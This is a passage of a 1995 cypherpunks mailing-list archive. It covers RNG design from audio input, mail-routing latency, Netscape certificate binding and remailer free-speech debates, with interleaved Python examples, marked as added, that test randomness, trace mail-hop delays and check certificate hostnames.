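    return b"".join(hashlib.md5(raw[i:i + block]).digest()
                    for i in range(0, len(raw) - block + 1, block))


def counter_pad(n_blocks):
    """MD5 of a plain counter: no entropy, anyone can regenerate it."""
    return b"".join(hashlib.md5(i.to_bytes(8, "big")).digest()
                    for i in range(n_blocks))


def bits(data):
    return [(byte >> k) & 1 for byte in data for k in range(7, -1, -1)]


def monobit_z(data):
    """Ones-versus-zeros balance as a z-score (0 is perfectly balanced)."""
    b = bits(data)
    return (2 * sum(b) - len(b)) / math.sqrt(len(b))


def autocorr_z(data, lag):
    """Agreement between each bit and the bit `lag` places later, as a z-score."""
    b = bits(data)
    n = len(b) - lag
    agree = sum(b[i] == b[i + lag] for i in range(n))
    return (2 * agree - n) / math.sqrt(n)


def byte_entropy(data):
    """Plug-in Shannon estimate in bits per byte (8.0 is the maximum)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def compressed_bits_per_block(raw, block=BLOCK):
    """Upper bound on entropy per block, from how far zlib shrinks the input."""
    return 8 * len(zlib.compress(raw, 9)) * block / len(raw)


def looks_random(data, min_entropy=7.9):
    """True when a sample of a few KiB passes all three statistical checks."""
    zs = [monobit_z(data)] + [autocorr_z(data, lag) for lag in (1, 8, 16)]
    return all(abs(z) < Z_LIMIT for z in zs) and byte_entropy(data) > min_entropy


if __name__ == "__main__":
    raw = constructed_audio(BLOCK * 256)
    samples = (("raw audio", raw), ("MD5 of audio", condense(raw)),
               ("MD5 of counter", counter_pad(256)))
    for name, sample in samples:
        print(f"{name:15s} entropy={byte_entropy(sample):.3f} "
              f"lag-8 z={autocorr_z(sample, 8):8.1f} pass={looks_random(sample)}")
    print("zlib bound, bits per 512-byte block:",
          round(compressed_bits_per_block(raw)))
```

The zlib figure is only an upper bound on the entropy in a block, so a large margin over the 128 output bits does not by itself establish that the pad is unpredictable.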





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Mon, 2 Oct 95 19:34:19 PDT
To: cypherpunks@toad.com
Subject: SAIC Snags INFOSEC
Message-ID: <199510030234.WAA02732@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


URL: http://www.disa.mil/ciss/itsc/docs/brochure.html


   INFOSEC Technical Services Contract The Solution to Your Security
   Needs Now!
   
   What is INFOSEC
   
   Information Systems Security (INFOSEC) is defined as the protection of
   information systems against unauthorized access to or modification of
   information, whether in storage, processing or transit, and against
   the denial of service to authorized users or the provision of service
   to unauthorized users, including those measures necessary to detect,
   document, and counter such threats. For operations and for economic
   efficiencies INFOSEC is an enabling feature. It is the discipline that
   protects the integrity, availability, and confidentiality of our
   information assets and systems. All information is important and
   valuable to its users and requires some level of protection from
   unauthorized disclosure (confidentiality), assured access by users
   (availability), and protection from unauthorized change (integrity).
   We believe that good security is a mission enhancer, not a mission
   detractor! Our overall approach to information systems security is
   to PROTECT information using a layered defense based on risk
   management and cost benefit analysis. We must be able to monitor all
   our systems and networks in real time to DETECT intrusions or hostile
   actions at all levels, and then REACT to isolate the systems, correct
   the security breach, restore service to the users, and act to prevent
   future attempts.
   
   Center for Information Systems Security
   
   Background
   
   In July 1990, the Assistant Secretary of Defense for Command, Control,
   Communications, and Intelligence ASD(C3I), started an investigation
   effort for coordinated DOD-level management of defense INFOSEC
   initiatives. DCA, now DISA, was designated as the lead agency with
   assistance from the National Security Agency (NSA). A DISA/Center for
   Information Systems Security (CISS) and NSA plan was developed and
   approved for establishment of the Defense Information Systems Security
   Program (DISSP).
   
   CISS has its origin in the Defense Information Systems Security
   Program (DISSP), a joint DISA/NSA program. Continuing as a joint
   program office CISS's mission is to manage, coordinate and provide
   direct INFOSEC application support to DOD programs, develop standards
   and protocols for INFOSEC and expedite the implementation of MLS
   command, control and communications systems for DOD. The CISS provides
   a means to fully review, coordinate, and make recommendations
   concerning the implementation of policy, architecture, and products to
   support DOD objectives.
   
   Mission
   
   The Center for Information Systems Security (CISS) is a joint DISA/NSA
   organization charged with executing the centrally managed Defensive
   Information Warfare (IW-D) and INFOSEC functions within DOD.
   
   CISS is the focal point for assuring availability, integrity, and
   confidentiality of all DII systems and information. We provide direct
   support to DOD services and agencies, and define requirements for DII
   INFOSEC standards. Additionally, CISS provides central coordination
   and reporting response to all DOD INFOSEC incidents, and operational
   protection, detection, reaction, and vulnerability analysis to the
   DII.
   
   What is the INFOSEC Technical Services Contract?
   
   DISA awarded the INFOSEC Technical Services Contract (INFOSEC TSC) on
   12 July 1995 to two large businesses (CSC and SAIC) and one small
   business (MERDAN Group, Inc.). CISS, a joint DISA/National Security
   Agency (NSA) program, has been chartered to provide INFOSEC services
   throughout DoD. INFOSEC support will be provided by CISS
   infrastructure resources with contractual assistance from the INFOSEC
   TSC. The primary responsibility of the joint program office is to
   assure the effective and coherent application of INFOSEC to the
   overall Defense Information Infrastructure (DII).
   
   The contract offers technical support in the areas of:
   
     * INFOSEC Security Policy
     * INFOSEC Requirements Support
     * INFOSEC Architecture and Engineering
     * INFOSEC Independent Validation and Applications Verifications
     * INFOSEC Products and Applications DoD Goal Security Architecture
       (DGSA)
     * INFOSEC Certification and Accreditation Master Transition Plan
     * INFOSEC Technology and Training Documentation, and Countermeasures
       Information Dissemination
     * INFOSEC Multilevel Security Technology
     * INFOSEC Technical Management and Capabilities Planning (TMP)
     * INFOSEC Professionalization Program and Project Management
     * INFOSEC Standards and Protocols
       
   The contract is not a Federal Information Processing (FIP) hardware or
   software procurement contract.
   
   All DOD departments and agencies requiring INFOSEC services can
   utilize the INFOSEC TSC. The contracts are Indefinite Delivery,
   Indefinite Quantity (IDIQ) with individual firm fixed price, cost plus
   fixed fee, and time and material Delivery Orders (DOs) awarded for
   each requirement. Ceiling on the INFOSEC TSC is $1.095B which includes
   authority for other Federal (non-DOD) Agency use of 10% of current
   contract value. An additional 10% authority for non-DOD federal
   agencies is anticipated from GSA. There will be a 2 percent fee
   applied to all Delivery Orders.
   
   Details for submitting requirements are spelled out in the "Guide for
   the INFOSEC TSC."
   
   
   Advantages of Using the INFOSEC Technical Services Contract
   
     * Provides contractual assistance in support of INFOSEC and INFOWAR
       requirements
     * Provides a means to obtain assistance in addressing complex
       systems security issues
     * Provides a high level of expertise to support systems
       certification and accreditation
     * Provides necessary DII/NII security support for DII/NII open
       systems architecture
     * Provides hardware and software support for INFOSEC prototyping and
       incidental hardware/software required to perform the task
       
     
_________________________________________________________________

   
   
   The INFOSEC TSC guide can be obtained from the:
   
   INFOSEC Technical Support Office (ITSO)
   Center for Information Systems Security
   5111 Leesburg Pike, Suite 100
   Falls Church, VA 22041-3201
   
   Attention: Ms. Nanette Chopin
   (703) 681-1331
   ---or---
   Attention: Mr. James Lindou
   (703) 681-1333
   FAX (703)681-1393
   ---or---
   through the World Wide Web at http://www.disa.mil/ciss/itso.html.
   
     
_________________________________________________________________

   
   
   SAIC Team Members
   
     * Bell Atlantic
     * Bellcore
     * CTA, Inc.
     * George Mason University
     * Information Security Systems, Inc.
     * JANUS Associates
     * Lockheed Martin
     * MICON Services Company
     * Pailen-Johnson Associates, Inc.
     * Secure Solutions, Inc.
     * Sprint
     * Technautics, Inc.
     * TeleCommunication Systems (TCS)
     * TELOS


   CSC Team Members
   
     * A.B. Floyd
     * Automation Research Systems (ARS), Ltd.
     * Bowie State
     * Computer Associates
     * DEC
     * DMR Group
     * Group Technologies
     * Intermetrics
     * IRE
     * Metters Industry
     * MIS Training Institute
     * Northrop Grumman
     * ORA
     * Oracle
     * RSSI
     * Space Applications Corporation
     * Systems Engineering Solutions, Inc.
     * Sparta
     * Spyrus
     * SRA
     * TASC
     * USATREX
     * Xerox
   
   
   Merdan Group, Inc. Team Members
   
     * Advanced Data Concepts, Inc.
     * Management Technology Strategic Association, Ltd.
       
     
_________________________________________________________________

   
   
   For More Information Contact the INFOSEC Technical Support Office
   
   Ms. Nanette Chopin, COR/DPM
   Voice: (703) 681-1331
   Fax: (703) 681-1393
   E-Mail to Ms. Nanette Chopin 
   
   
   Mr. Jim Lindou, ACOR/PM
   Voice: (703) 681-1333
   Fax: (703) 681-1393
   E-Mail to Mr. Jim Lindou 
   
   
   Defense Information Systems Agency
   5111 Leesburg Pike, Suite 100
   Falls Church, Virginia 22041
   
     
_________________________________________________________________

   

   
   
   You can mail any questions about these documents to:
   
   Ms. Nanette Chopin 
   
   
   You can mail any questions about the DISA server to:
   
   yorkw@ncr.disa.mil - Last revision: 16 August 1995 
   okonw@ncr.disa.mil
   
   
     
_________________________________________________________________







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 2 Oct 95 20:24:46 PDT
To: cypherpunks@toad.com
Subject: RNG's and time-stamps
Message-ID: <199510030340.WAA06046@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Now that is an idea, exploit the dynamic nature of Internet. Use the
difference in times between the stamp and when the mail arrives to generate
a RNG.

Just a thought.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 14:49:09 PDT
To: trei@process.com
Subject: Re: List latency.
In-Reply-To: <9510021744.AA01741@toad.com>
Message-ID: <9510022148.AA06696@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei writes:
[...]
 > It looks like there's a considerable delay entering and leaving uunet. I'm not sure which
 > machine gets the blame, but it's either toad&uunet, or uunet&alcor.

sending mail to myself (not going through list processing),
via toad.com, It took 32 seconds for my host to find, contact and send
the mail to toad.com, then it took more than 5 minutes for it to come
back, and specially it came back as :

Received: from relay3.UU.NET by hplyot.obspm.fr with SMTP
	(1.36.108.10/16.2.5) id AA05486; Mon, 2 Oct 1995 19:48:39 +0100
Return-Path: <dl@hplyot.obspm.fr>
Received: from toad.com by relay3.UU.NET with SMTP
	id QQzjtb16149; Mon, 2 Oct 1995 14:47:28 -0400
Received: from hplyot.obspm.fr by toad.com id AA02554; Mon, 2 Oct 95
11:42:59 PDT
Received: by hplyot.obspm.fr
	(1.36.108.10/16.2.5) id AA05454; Mon, 2 Oct 1995 19:42:31 +0100

So the question now is :
 "Why the toad.com send its mail through *.uu.net instead of sending
  it directly ?"

[it would/should cut at least by half the delay {at the cost of more
DNS traffic for toad.com}]

Also I suspect the long delays we sometimes see come from
toad<->uu.net interactions [besides the normal overhead of sending one
mail to thousands of people]

(the service is great anyhow)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Chirac Panama Peking Serbian Treasury smuggle Saddam Hussein
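
The per-hop arithmetic behind the Received lines quoted in this message, as an added example that is not part of the original post. The header text is copied from the message (with the folding whitespace on the wrapped date restored); the function names are hypothetical.

```python
import re
from email import message_from_string
from email.utils import parsedate_to_datetime

# Received lines copied from the message above. The continuation whitespace in
# front of "11:42:59 PDT" is restored so the text parses as folded headers.
RAW_HEADERS = """\
Received: from relay3.UU.NET by hplyot.obspm.fr with SMTP
\t(1.36.108.10/16.2.5) id AA05486; Mon, 2 Oct 1995 19:48:39 +0100
Return-Path: <dl@hplyot.obspm.fr>
Received: from toad.com by relay3.UU.NET with SMTP
\tid QQzjtb16149; Mon, 2 Oct 1995 14:47:28 -0400
Received: from hplyot.obspm.fr by toad.com id AA02554; Mon, 2 Oct 95
\t11:42:59 PDT
Received: by hplyot.obspm.fr
\t(1.36.108.10/16.2.5) id AA05454; Mon, 2 Oct 1995 19:42:31 +0100
"""


def received_stamps(raw_headers):
    """Return [(stamping_host, aware_datetime)], oldest hop first."""
    msg = message_from_string(raw_headers)
    stamps = []
    for value in msg.get_all("Received", []):
        info, sep, date_part = value.rpartition(";")
        if not sep:
            continue                      # no timestamp on this line
        try:
            when = parsedate_to_datetime(" ".join(date_part.split()))
        except (TypeError, ValueError):
            continue                      # unparseable date: skip the hop
        by = re.search(r"\bby\s+(\S+)", info)
        stamps.append((by.group(1) if by else "?", when))
    stamps.reverse()                      # each relay prepends, so newest is first
    return stamps


def hop_delays(raw_headers):
    """Return [(from_host, to_host, seconds)] between consecutive stamps.

    Each stamp comes from a different machine's clock, so a delay includes
    clock skew between the two hosts as well as queueing and transit time.
    """
    stamps = received_stamps(raw_headers)
    return [(a[0], b[0], int((b[1] - a[1]).total_seconds()))
            for a, b in zip(stamps, stamps[1:])]


def impossible_hops(raw_headers):
    """Hops with a negative delay: skewed clocks or a hand-written header."""
    return [hop for hop in hop_delays(raw_headers) if hop[2] < 0]


if __name__ == "__main__":
    for src, dst, secs in hop_delays(RAW_HEADERS):
        print(f"{src:>18} -> {dst:<18} {secs:4d} s")
    print("total:", sum(h[2] for h in hop_delays(RAW_HEADERS)), "s")
```

All four stamps fall within about six minutes once converted to a common zone; the three time zones in the raw headers are what make the trace hard to read by eye.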




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Mon, 2 Oct 95 14:55:45 PDT
To: Weld Pond <weld@l0pht.com>
Subject: `NOISE' what crypto is that ? [was Re: NT and C2]
In-Reply-To: <Pine.BSD/.3.91.951002132703.28404A-100000@l0pht.com>
Message-ID: <9510022154.AA06732@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Weld Pond writes:
[...]
 > http://www.iquest.net/cgi-bin/gate2?|mmMgT008://bbb.PHDx10.ix0/ibLD1P7i/ExUP0e/A1vxiw.T05smgmRibLD1P7iggyR/D1UgM/ppp/6DYsPv/ibLD1P7i/ExUP0e/ExUP0egMmN1xAUvTgrmNvgmwONgOmyMyYnlXkKCfX,ve8TxU8Di31,nlXk6CllpW,ve8TxU8Di31MRmypd
 >
What kind of (en)coding is that ? some kind of rot13++ ?


dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Legion of Doom mururoa explosion NSA cryptographic NORAD Treasury




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 2 Oct 95 22:55:17 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <199510030445.AAA29715@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.951002225219.7461A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Oct 1995, Perry E. Metzger wrote:
> 
> Radio signals can be interfered with or listened to -- never
> underestimate the opponent. Computer interfaced radiation detectors,
> in spite of Tim's claim to the contrary, are pretty cheap and very
> hard to interfere with.

What about a beam of high intensity ionising radiation aimed at the 
detector? Since we're dealing with low intensity sources, this could force
the RNG into a small part of its range. Beware of black helicopters 
carrying cyclotrons :-)

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 2 Oct 95 23:02:32 PDT
To: cypherpunks@toad.com
Subject: Re: Introducing Johnson-Grace
In-Reply-To: <95Oct2.185011pdt.21953@mail.jgc.com>
Message-ID: <199510030602.XAA18317@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In an unsolicited advertisement,
Publisher Program <TechSupport@jgc.com> writes:

 > You may have never heard of Johnson-Grace Company, but you
 > have probably seen the benefits of our image compression
 > technology in America Online and Apple's eWorld.

Two painfully slow online services.

 > In fact, ART formatted images transmit three times faster
 > over conventional telephone lines than old-style GIFs and
 > JPEGs.

This might very well be true for a restricted set of images, but
I seriously doubt that arbitrary color photographic images take
three times less space with this system than with JPEG given
comparable retention of detail.

Also, are we suggesting that images transmit exactly three times
faster than both GIF and JPEG?  This is somewhat odd, given that
the difference in size between the two latter formats is often a
factor of ten. If you can beat JPEG by a factor of three, you can
beat GIF by about a factor of 30.

If you really can do this, you should be working on MPEG-4, and
not spamming our nice little list with advertising material.  I
should point out that neither Fractals, Lapped transforms, or
Wavelets can beat JPEG by a factor of three, and neither, I
suspect, can you.

[Huge Self-Promotion and Wonders of the Product Elided]

 > For example, our proprietary Splash(TM) feature displays a
 > full-size image in roughly one second; the image then
 > becomes sharper as more detail is received and decompressed
 > in additional layers, producing a high-quality final image
 > within seconds.

JPEG can do this quite easily with either the progressive or
hierarchical modes of transmission.  Why reinvent the wheel?

The engineering graveyard is littered with the bodies of various
entities who announced spectacular image compression advances. In
each case, reality dawned shortly after the hype died down.

 > Additionally, Johnson-Grace is in discussions with all the
 > other major Web browser companies to include ART technology
 > in their products. We expect broad support by the end of the
 > year.

Translation: We've learned how to use the "associate" command in
WinDoze File Manager.

 > For example, later this year you'll see news of ART speech
 > compression technology that will enable publishers to author
 > interleaved sound and images for real-time playback at
 > 14,400 bits per second.

It's been done.  Do the words "low bandwidth videoconferencing"
ring a bell?  I'll be truly surprised if you can beat
PictureTel's complex proprietary algorithm for sound and image
compression.

[Silly Form Deleted]

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don.Stephenson@Eng.Sun.COM (Don Stephenson)
Date: Mon, 2 Oct 95 23:22:34 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM
Subject: Re: NetScape's dependence upon RSA down for the count!
Message-ID: <9510030606.AA09386@icenine.Eng.Sun.COM>
MIME-Version: 1.0
Content-Type: text/plain



> From cmcmanis@scndprsn Mon Oct  2 09:07:33 1995

> Why forge it? Why not simply buy a netsite server with a valid certificate.
> Let's say you paid full list for it $5000. It is the classic MITM attack
> but the protection against that attack was generally that the parties
> communicating "knew" each other. 

Of course, the attacker would be leaving a very strong pointer back to 
themselves as evidence.


> This is a fundamental weakness of putting the security at the SSL level as
> opposed to a possibly higher level. With the netscape attack since your
> client never cares "how" (or to whom) the SSL connection is made, it never
> shows you the information about where the source key came from. Only that
> it is valid.

I'm not sure this is really an issue of where the security is layered, 
but rather a flaw in the use of it, in not requiring the unambiguous 
specification of the "service name" (what's in the certificate) beforehand, 
or confirming it after the connection is established.  

You must have a binding between the target URL and the desired "service name", 
regardless of whether you have the security protocol in the session layer (SSL) 
or the application/http layer (Secure-HTTP).


- Don
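
The binding Don describes, as an added example that is not part of the original post: a client that only asks "is the certificate valid?" accepts any properly issued certificate, while a client that also compares the certificate's names with the host in the URL rejects the substituted one. The certificates are constructed samples in the dict form Python's `ssl.SSLSocket.getpeercert()` returns; the host names and function names are hypothetical.

```python
from urllib.parse import urlsplit

# Constructed certificates. MITM_CERT is assumed to be validly issued by a
# trusted CA, but to the attacker's own server.
SHOP_CERT = {
    "subject": ((("commonName", "shop.example"),),),
    "subjectAltName": (("DNS", "shop.example"), ("DNS", "*.shop.example")),
}
MITM_CERT = {"subject": ((("commonName", "mitm.example"),),)}


def cert_dns_names(cert):
    """Names the certificate speaks for: subjectAltName DNS entries, or the
    commonName when there are none (as in certificates of the SSL 2 era)."""
    names = [v for kind, v in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        names = [v for rdn in cert.get("subject", ()) for k, v in rdn
                 if k == "commonName"]
    return names


def name_matches(pattern, host):
    """Exact label match; '*' may replace only the whole left-most label."""
    p = pattern.lower().rstrip(".").split(".")
    h = host.lower().rstrip(".").split(".")
    if len(p) != len(h):
        return False
    if p[0] == "*":
        return len(p) >= 3 and p[1:] == h[1:]
    return p == h


def chain_only_client(url, cert, chain_valid):
    """The behaviour criticised in the thread: any valid certificate will do."""
    return chain_valid, "accepted: certificate chain is valid"


def binding_client(url, cert, chain_valid):
    """Accept only when the certificate is valid AND names the URL's host."""
    host = urlsplit(url).hostname
    if not chain_valid:
        return False, "rejected: certificate chain not trusted"
    if not host:
        return False, "rejected: URL has no host to bind to"
    names = cert_dns_names(cert)
    if any(name_matches(n, host) for n in names):
        return True, "accepted: certificate names " + host
    return False, "rejected: certificate is for %s, not %s" % (names, host)


if __name__ == "__main__":
    url = "https://shop.example/checkout"
    for label, cert in (("genuine", SHOP_CERT), ("substituted", MITM_CERT)):
        print(label, "| chain only:", chain_only_client(url, cert, True)[1])
        print(label, "| with binding:", binding_client(url, cert, True)[1])
```

In current Python the same check is enforced by the standard library when a context from `ssl.create_default_context()` is used with `server_hostname` set.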





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 2 Oct 95 20:06:38 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: `Hack Microsoft' challenge is NYT Computer News Daily's top story
In-Reply-To: <199510030135.VAA17223@mail-e1a.megaweb.com>
Message-ID: <199510030306.XAA24030@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


MIGUEL DIAZ writes:
> I don't know about everyone else, but a T-shirt seems a very 
> small reward for uncovering a "hole" in the encryption 
> algorithm of Microsoft products.  

I don't know about anyone else, but helping to protect the confidential data 
of millions of users around the world seems a very large reward for
uncovering a hole in the encryption algorithms of M$ products.

Clearly, YMMV.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 2 Oct 95 20:09:41 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Certificate proposal & X509 clarifications
Message-ID: <9510030308.AA10671@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>  Therefore, you
>have to get someone owning an OBJID tree branch to define meanings for you
>-- and you have to publish some worldwide book of mappings, etc.

While I am no big fan of OID's (and I really dislike ASN.1 -- and nobody
ever explained to me why the ISO RPC standard doesn't use it), if
anybody really needs an ISO OID tree, I will probably be willing to
tear off a piece of OSF's:
	1.3.22
	{ iso(1) identified-org(3) osf(22) }




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 2 Oct 95 20:14:02 PDT
To: cypherpunks@toad.com
Subject: Re: Time Lag
Message-ID: <9510030313.AA10680@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Internet email is highly dynamic.  Hosts can be up/down.  Routers can
be up/down.  Gateways can be up/down.  Routing databases can be out of
date.  Cables can be cut.  Load averages can affect whether a host accepts
SMTP connections.  And so on.

Sending one message and rigorously studying timestamps in the Received
lines and using that to draw conclusions about mail propagation is a
complete waste of time.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Tue, 3 Oct 95 00:00:30 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape finally issuing md5sums/pgp signed binaries ? (was Re: NetScape'sdependence upon RSA down for the count!)
Message-ID: <v02120d02ac969ce0cf99@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



The idea here is to use multiple alternative channels for distributing
the checksums (newsgroups, mailing lists, telephone support lines,
fax-back service, e-mail, etc.), in addition to the ftp sites.

Also, since you guys use (relatively untrusted) mirror sites, you can
distribute the checksums on your official sites, so that people can
verify them from you directly, even if it's more practical for their
main download to be from a "local" mirror.

>
>  I've been thinking about this recently for obvious reasons.  My concern
>is that if someone can attack your download of netscape, they could also
>attack your download of the program that validates netscape.  Is there
>really any way out of this one?
>
>        --Jeff






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@mhv.net>
Date: Mon, 2 Oct 95 21:16:18 PDT
To: cypherpunks@toad.com
Subject: Re: The Free Speech Implications of Remailers
Message-ID: <9510030417.AA14938@mhv.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 PM 10/1/95 -0700, Tim May wrote:
<snip>
>Well, guess what? The very technologies we have been so central in
>deploying are the technologies that make _conventional_ means of
>controlling distasteful material so hard.
>system of the various mail delivery systems.)
<snip>
>Crypto anarchy means the racists, sexists, speciesists, and other "ists"
>cannot be muzzled. I call this a good thing. It's why I'm here.


   Excellent analysis.  One can't argue with logic, nor should one forget
the purpose and spirit of this list.
   The fact that spamming is in poor taste is irrefutable.  However, some of
the "where did this come from"? responses are starting to sound like some
people are suddenly against the use of anonymous remailers.  I, for one,
would hope that people are simply rising to the challenge of tracing the
routers.
   Kill the message if you are so moved -- not the technological messenger.
  



********************************************************************
Lynne L. Harrison, Esq.
Poughkeepsie, New York 
lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ironwolf@Minotaur.com (Robert McNally)
Date: Mon, 2 Oct 95 22:22:26 PDT
To: cypherpunks@toad.com
Subject: Re: CYPHERPUNK considered harmful.
Message-ID: <v01530500ac919ccd39d8@[198.81.209.45]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Recently Peter Trei <trei@process.com> called for new names and slogans to
replace the negatively loaded name "Cypherpunks." Here is one effort
(partially based on his suggestion, but with refinements.) Note that I
intend the term "strong privacy" to include both cryptography-based tools,
and other tools such as remailers. I hereby place the following into the
public domain.

* * *

I lock my car.
I secure my house.
I send my letters in envelopes.
I store my valuables in safe places.
I don't let strangers hold my wallet.
I don't wear a name tag everywhere I go.
I carry my cash and credit cards out of sight.
I don't show off my key number when visiting the ATM.

I protect my e-mail and files with strong privacy tools.

Don't you?


A message from SPAN: the Strong Privacy Advocates Network

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----

-------------------------------------------------------------------------
NOTE: Currently travelling on sabbatical. Expect responses within 7 days.
-------------------------------------------------------------------------
                   ROBERT McNALLY - MINOTAUR CONSULTING
                   Ironwolf@Minotaur.com * 714/648-2248
    Specializing in Computer Games and Digital Entertainment Software
 Over 15 Years of Industry Experience: Creative * Technical * Managerial
-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 2 Oct 95 21:34:52 PDT
To: mark@unicorn.com (Rev. Mark Grant)
Subject: Re: One-Time-Pad generation from audio device
In-Reply-To: <Pine.3.89.9510021627.A14466-0100000@unicorn.com>
Message-ID: <199510030437.AAA05775@homeport.org>
MIME-Version: 1.0
Content-Type: text


	If there is no microphone plugged into the audio port, the
random numbers tend to be of very poor quality.  (At least on a sun,
visual inspection of the output shows how poor the numbers are.)  I
suspect a few quick tests, followed by warnings to the user to turn on
the microphone, would be quite useful.

Adam


% head /dev/audio | od | head
0000000  077776 077777 077377 177577 177777 177377 177576 077776
0000020  077776 177577 077376 077376 077577 177576 177177 077376
0000040  077576 077776 077377 177777 177576 177377 077377 077377
0000060  077576 177775 077576 177776 177576 177377 177176 177177


| The code basically reads in a 512-byte block from /dev/audio, then takes
| the MD5 of that block to generate 16 bytes of the OTP. The raw audio data
| I'm getting is not particularly random and will compress by 3:1 using gzip
| or compress, so I'm assuming that using a 32:1 ratio here via MD5 will
| give a truly random output (it's certainly uncompressible).
| 
| Before I release the source code to the Net, can anyone give me any good
| reasons to believe that this won't produce physically random output, or
| make suggestions on how to test, or improve, the generated output ? There's
| a #define which can be used to easily increase the amount of data fed into
| the MD5, but at the moment it will only generate about 1 MB per hour on a
| Sparcstation (limited by the audio input rate), so I don't want to
| increase that if I don't have to. 



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume
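
An added example (not Privtool code, and not anything posted in the thread) of the quick test Adam suggests, run on the bytes of his od dump, and of why measuring the hashed output with ent or gzip says nothing about the input. The `derate` and `min_distinct` thresholds are illustrative assumptions, and truncated SHA-256 stands in for the MD5 step.

```python
import hashlib
import math
from collections import Counter

# Raw samples from the od dump in the message above (16-bit octal words).
# Big-endian byte order is assumed; it does not change the byte histogram.
OD_WORDS = """
077776 077777 077377 177577 177777 177377 177576 077776
077776 177577 077376 077376 077577 177576 177177 077376
077576 077776 077377 177777 177576 177377 077377 077377
077576 177775 077576 177776 177576 177377 177176 177177
""".split()
SILENT_RAW = b"".join(int(w, 8).to_bytes(2, "big") for w in OD_WORDS)

BLOCK_SIZE = 512   # raw bytes read per pad block, as in the thread
OUT_BYTES = 16     # pad bytes produced per block, as in the thread


def shannon_bits_per_byte(data):
    """Byte-histogram Shannon entropy, the figure a tool like ent reports.
    A sample of n bytes can never score above log2(n) on this measure."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def min_entropy_bits_per_byte(data):
    """Most-common-value estimate: -log2 of the most frequent byte's share.
    It assumes independent samples, so on audio it is an upper bound."""
    return -math.log2(max(Counter(data).values()) / len(data))


def assess_raw_block(raw, out_bits=8 * OUT_BYTES, derate=0.25, min_distinct=16):
    """Decide whether a raw block may be credited with out_bits of entropy.
    derate and min_distinct are illustrative policy values, not measurements."""
    distinct = len(set(raw))
    credited = min_entropy_bits_per_byte(raw) * len(raw) * derate
    warnings = []
    if distinct < min_distinct:
        warnings.append("too few distinct sample values: is the microphone on?")
    if credited < 2 * out_bits:
        warnings.append("credited entropy below twice the requested output")
    return {"distinct": distinct, "credited_bits": credited,
            "ok": not warnings, "warnings": warnings}


def condition(raw):
    """Hash each BLOCK_SIZE chunk down to OUT_BYTES (truncated SHA-256 here)."""
    out = bytearray()
    for i in range(0, len(raw) - BLOCK_SIZE + 1, BLOCK_SIZE):
        out += hashlib.sha256(raw[i:i + BLOCK_SIZE]).digest()[:OUT_BYTES]
    return bytes(out)


def counter_input(blocks):
    """Constructed worst case: fully predictable 'audio' (a block counter)."""
    return b"".join(i.to_bytes(4, "big") * (BLOCK_SIZE // 4)
                    for i in range(blocks))


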